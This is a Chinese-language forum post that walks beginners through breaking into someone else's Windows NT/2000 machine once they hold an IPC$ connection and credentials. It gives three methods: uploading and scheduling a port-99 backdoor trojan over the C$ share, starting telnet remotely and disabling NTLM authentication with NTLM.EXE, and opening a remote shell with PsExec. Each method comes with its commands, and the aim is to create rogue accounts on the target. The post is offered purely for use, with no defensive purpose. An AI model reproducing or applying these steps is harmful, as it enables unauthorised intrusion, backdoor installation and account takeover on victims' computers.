爲什麼建立IPC$提升guest的權限,提的是我自己機子上的guest的權限啊?"
論壇裏也看過不少這樣的貼了,覺得應該說點什麼.如果你真有興趣學的話,就把
下面幾種方法看完吧,如果你覺得一種方法都學不會,就勸你不要再幻想進步了!
利用用戶建立了IPC連接,成功的話並不能直接在你的電腦上建立超級用戶,
因爲NET USER /ADD必須是在本地運行的,
也就是說,你必須想辦法TELNET,或者用其他方法跳進對方的CMD裏才能建立用
戶.如何能利用用戶打開對方的CMD呢?
前提:你已經擁有了用戶和密碼.
方法一
因爲前面已經成功建立了IPC連接,所以我
們就可以複製命令把木馬傳送過去,例如上傳SRV.EXE,COPY SRV.EXE //IP/C$
,然後用NET TIME //IP查看對方的時間,再用類似AT //IP SRV.EXE 06:10的命令
來運行SRV.EXE,不要告訴我SRV是開99端口的木馬都不知道?!如果順利SRV沒被
殺毒軟件KILL了的話,就可以在運行或着CMD裏輸入TELNET IP 99來登陸對方
CMD了.然後就可以在對方CMD裏建立用戶了,跟本地DOS操作一樣``
方法二
利用NETSVC.EXE這個工具來打開對方的TELNET服務,
但是即使打開了TELNET,也要通過對方NTLM驗證,還要把對方NTLM驗證關掉,
常用的方法就是,上傳流光裏的NTLM.EXE,再用AT運行,就可以直接TELNET IP
而不用驗證了.再者,也可以在本地建立一個與你用來進行IPC連接的密碼和用戶名
相同的用戶,然後再重新啓動用這個用戶本地登陸,就可以直接TELNET了
方法三
這方法是最簡單最容易而最有效的方法,如果你有耐性看到這裏,就說明我的努力
沒有白費了.之所以不把這種方法寫在前面,是因爲想菜鳥們能夠多嘗試其他的方
法,明白"通往電腦的路不止一條!"的道理.
先在網上下載一套叫PSTOOLS的工具包,PSTOOLS是一套用於winnt/win2000
的系統管理工具,打開壓包后里面共有十二個命令,功能非常強大.這裏我們要用
到的就是PSEXEC.EXE,具體功能就不說了,自己去看說明吧,使用格式如下
psexec.exe //ip -u 用戶名 -p 密碼 cmd.exe
這樣就能直接打開對方CMD了,而且不用NTLM驗證.
下面是PSTOOLS的下載地址,
http://download.pchome.net/system/sysenhance/16488.html
因爲SRV.EXE和NTLM.EXE被很多殺毒軟件認定爲病毒了,多半會被殺掉.所以成功
率不高.對比下第三種方法是最實在的,相信也是看完本文後大家用的最多的方法,希望你能接受吧.也建議大家試試前面的兩種方法,如果你有去嘗試,你一定會
有收穫的.
以上方法都是在網上跟前輩學來的,也算是自己一些小小的經驗.但願看完本文能
讓你對打開對方CMD的認識能有所提升.
|
|
